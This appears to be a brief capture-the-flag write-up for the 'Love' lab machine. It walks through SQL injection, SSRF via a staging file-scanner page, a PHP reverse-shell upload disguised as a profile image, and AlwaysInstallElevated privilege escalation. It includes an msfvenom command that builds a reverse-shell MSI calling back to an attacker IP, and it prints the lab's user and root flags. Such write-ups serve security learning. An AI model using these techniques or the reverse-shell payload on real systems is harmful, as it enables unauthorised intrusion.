Love

Enumeration

Ports and Services

Software Installed:

Nmap Scan Results:

Port 80 Gobuster Scan:

Port 80 Nikto

Port 443 SSLScan:

The Voter parameter on main page is vulnerable to sql injection:

Discovered Databases:

• information_schema
• mysql
• phpmyadmin
• test
• votesystem
  • admin
  • candidates
  • positions
  • voters
  • votes

Password hash from duimp on admin database

Port 5000 shows forbidden pages

Initial Foothold

http://staging.love.htb/beta.php has a file scanning php page
hosted testfile and it uploaded:

Put in http://127.0.01:5000/ because I suspect the forbidden page is liestening on localhost only and this owuld possibly retrieve the index:

The profile image upload accepts php files.
Copied a windows php shell from https://github.com/ivan-sincek/php-reverse- shell/blob/master/src/php_reverse_shell.php
Uploaded as profile photo while listening and received a shell

User.txt Proof Screenshot

##

User.txt Contents

255e0a893c609d07f01c20f029eae609

Privilege Escalation

AlwaysInstallElevated

(Link in the pic is valid)

Created a reverse shell with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.208 LPORT=5555 -f msi -o shell.msi
Uploaded shell.msi
executed the msi

RootScreenshot Here:

Root.txt Contents:

bd7e6637dc0f7d777d416977d908b04f